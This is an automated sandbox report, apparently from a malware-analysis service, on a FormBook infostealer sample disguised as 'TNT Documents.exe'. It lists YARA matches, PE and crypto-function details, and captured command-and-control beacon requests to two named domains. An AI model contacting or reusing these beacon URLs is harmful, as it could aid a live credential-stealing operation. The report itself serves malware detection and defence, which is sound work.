Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1 Host: www.metronixmedical.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1 Host: www.coached.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: TNT Documents.exe
.NET source code contains very large strings
Source: TNT Documents.exe, Form1.cs Long String: Length: 22528
Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.cs Long String: Length: 22528
Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.cs Long String: Length: 22528
Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.cs Long String: Length: 22528
Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.cs Long String: Length: 22528
Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.cs Long String: Length: 22528
Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.cs Long String: Length: 22528
Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.cs Long String: Length: 22528
Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.cs Long String: Length: 22528
Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.cs Long String: Length: 22528
Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.cs Long String: Length: 22528
Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.cs Long String: Length: 22528
Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.cs Long String: Length: 22528
Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.cs Long String: Length: 22528
Uses 32bit PE files
Source: TNT Documents.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_00075ED2 0_2_00075ED2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_0236C2B0 0_2_0236C2B0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_023699E0 0_2_023699E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06B10BE0 0_2_06B10BE0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E7CFC8 0_2_06E7CFC8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E71F09 0_2_06E71F09
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E71498 0_2_06E71498
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E70C38 0_2_06E70C38
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E72DE8 0_2_06E72DE8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E755E8 0_2_06E755E8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E76198 0_2_06E76198
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E79A35 0_2_06E79A35
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E7A7E8 0_2_06E7A7E8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E753F8 0_2_06E753F8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E793D6 0_2_06E793D6
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E74F28 0_2_06E74F28
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E74F19 0_2_06E74F19
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E73CE0 0_2_06E73CE0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E760E8 0_2_06E760E8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E748C9 0_2_06E748C9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E73CDF 0_2_06E73CDF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E748D8 0_2_06E748D8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E70040 0_2_06E70040
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E70006 0_2_06E70006
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E70C0D 0_2_06E70C0D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E75408 0_2_06E75408
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E755D8 0_2_06E755D8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E72DAA 0_2_06E72DAA
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E719A8 0_2_06E719A8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E72D81 0_2_06E72D81
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E75160 0_2_06E75160
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E76155 0_2_06E76155
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E75150 0_2_06E75150
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E7AD08 0_2_06E7AD08
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_0007958F 0_2_0007958F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_00074D8E 0_2_00074D8E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 5_2_00135ED2 5_2_00135ED2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 5_2_0013958F 5_2_0013958F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 5_2_00134D8E 5_2_00134D8E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00401030 7_2_00401030
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00408C8B 7_2_00408C8B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00408C90 7_2_00408C90
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00402D87 7_2_00402D87
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00402D90 7_2_00402D90
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00402FB0 7_2_00402FB0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00AA5ED2 7_2_00AA5ED2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155F900 7_2_0155F900
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 7_2_01574120
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162E824 7_2_0162E824
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611002 7_2_01611002
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016228EC 7_2_016228EC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156B090 7_2_0156B090
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016220A8 7_2_016220A8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015820A0 7_2_015820A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01622B28 7_2_01622B28
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161DBD2 7_2_0161DBD2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158EBB0 7_2_0158EBB0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016222AE 7_2_016222AE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01621D55 7_2_01621D55
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01622D07 7_2_01622D07
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01550D20 7_2_01550D20
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156D5E0 7_2_0156D5E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016225DD 7_2_016225DD
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582581 7_2_01582581
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161D466 7_2_0161D466
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156841F 7_2_0156841F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01621FF1 7_2_01621FF1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162DFCE 7_2_0162DFCE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01576E30 7_2_01576E30
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161D616 7_2_0161D616
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01622EF7 7_2_01622EF7
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00AA4D8E 7_2_00AA4D8E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00AA958F 7_2_00AA958F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05681D55 17_2_05681D55
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05682D07 17_2_05682D07
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B0D20 17_2_055B0D20
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056825DD 17_2_056825DD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CD5E0 17_2_055CD5E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2581 17_2_055E2581
